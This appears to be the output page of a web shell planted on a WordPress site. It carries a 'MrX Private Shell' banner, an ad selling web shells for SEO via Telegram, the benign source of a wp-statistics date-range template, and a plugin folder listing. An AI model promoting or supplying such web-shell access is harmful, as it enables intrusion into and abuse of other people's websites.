__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="c-pages-date-range">
<form action="<?php echo esc_url(admin_url('admin.php')); ?>" method="get" class="wps-inline" id="jquery-datepicker">
<?php
if (isset($select_box)) {
?>
<br/>
<?php echo esc_attr($select_box['title']); ?>: <select name="<?php echo esc_attr($select_box['name']); ?>" id="<?php echo esc_attr($select_box['name']); ?>">
<?php
foreach ($select_box['list'] as $value => $name) {
$selected = ((isset($select_box['active']) and $select_box['active'] == $value) ? ' selected' : '');
?>
<option value="<?php echo esc_attr($value); ?>"<?php echo esc_attr($selected); ?>><?php echo esc_attr($name); ?></option>
<?php
}
?>
</select><input type="submit" value="<?php esc_html_e('Select', 'wp-statistics'); ?>" class="button-primary btn-danger wps-btn-inline"><br/>
<?php
}
?>
<!-- Set Page name To Form -->
<input name="page" type="hidden" value="<?php echo esc_attr($pageName); ?>">
<!-- Set Custom Input -->
<?php
if (isset($custom_get)) {
foreach ($custom_get as $key => $val) {
if (empty($val)) continue;
?><input name="<?php echo esc_attr($key); ?>" type="hidden" value="<?php echo esc_attr($val); ?>"><?php
}
}
?>
<?php if (!empty($DateRang['from'])) { ?>
<input type="hidden" name="<?php echo esc_attr(\WP_STATISTICS\Admin_Template::$request_from_date); ?>" id="date-from" value="<?php echo esc_attr($DateRang['from']); ?>">
<?php } ?>
<?php if (!empty($DateRang['to'])) { ?>
<input type="hidden" name="<?php echo esc_attr(\WP_STATISTICS\Admin_Template::$request_to_date); ?>" id="date-to" value="<?php echo esc_attr($DateRang['to']); ?>">
<?php } ?>
</form>
<div class="c-footer__filter js-pages-date-range-picker">
<div class="c-footer__filter__btn-group">
<?php if (isset($hasDateRang)): ?>
<button data-date-create="<?php echo isset($createDate) ? esc_attr($createDate) : null ?>" data-date-format="<?php echo str_replace('F', 'M', get_option('date_format')) ?>"
class="c-footer__filter__btn js-date-range-picker-btn
<?php echo isset($allTimeOption) && $allTimeOption === true ? 'js-date-range-picker-all-time' : ''; ?>">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="none">
<g clip-path="url(#A)" stroke="#666" stroke-linejoin="round">
<path d="M13 2.5H3a.5.5 0 0 0-.5.5v10a.5.5 0 0 0 .5.5h10a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5z"/>
<g stroke-linecap="round">
<path d="M11 1.5v2m-6-2v2m-2.5 2h11"/>
</g>
</g>
<defs>
<clipPath id="A">
<path fill="#fff" d="M0 0h16v16H0z"/>
</clipPath>
</defs>
</svg>
<span><?php echo esc_html__('Last 30 Days', 'wp-statistics') ?></span>
</button>
<?php endif ?>
</div>
<input type="text" class="c-footer__filters__custom-date-input js-date-range-picker-input" aria-label="Select custom date range">
</div>
<form action="<?php echo esc_url(admin_url('admin.php')); ?>" method="get" style="display: none" class="js-date-range-picker-form">
<input name="page" type="hidden" value="<?php echo esc_attr($pageName); ?>">
<?php
if (isset($custom_get)) {
foreach ($custom_get as $key => $val) {
if (empty($val)) continue;
?><input name="<?php echo esc_attr($key); ?>" type="hidden" value="<?php echo esc_attr($val); ?>"><?php
}
}
?>
<?php if (!empty($DateRang['from'])) { ?>
<input type="hidden" name="<?php echo esc_attr(\WP_STATISTICS\Admin_Template::$request_from_date); ?>" class="js-date-range-picker-input-from" value="<?php echo esc_attr($DateRang['from']); ?>">
<?php } ?>
<?php if (!empty($DateRang['to'])) { ?>
<input type="hidden" name="<?php echo esc_attr(\WP_STATISTICS\Admin_Template::$request_to_date); ?>" class="js-date-range-picker-input-to" value="<?php echo esc_attr($DateRang['to']); ?>">
<?php } ?>
</form>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| author-analytics | Folder | 0755 |
|
|
| category-analytics | Folder | 0755 |
|
|
| content-analytics | Folder | 0755 |
|
|
| filters | Folder | 0755 |
|
|
| partials | Folder | 0755 |
|
|
| privacy-audit | Folder | 0755 |
|
|
| addon-header-steps.php | File | 2.5 KB | 0644 |
|
| date.range.php | File | 4.52 KB | 0644 |
|
| footer.php | File | 9.19 KB | 0644 |
|
| header.php | File | 169 B | 0644 |
|
| menu-optimization.php | File | 5.13 KB | 0644 |
|
| menu-settings.php | File | 36.47 KB | 0644 |
|
| postbox.hide.php | File | 367 B | 0644 |
|
| postbox.toggle.php | File | 138 B | 0644 |
|
| tabbed-page-header.php | File | 8.21 KB | 0644 |
|
| title.php | File | 6.29 KB | 0644 |
|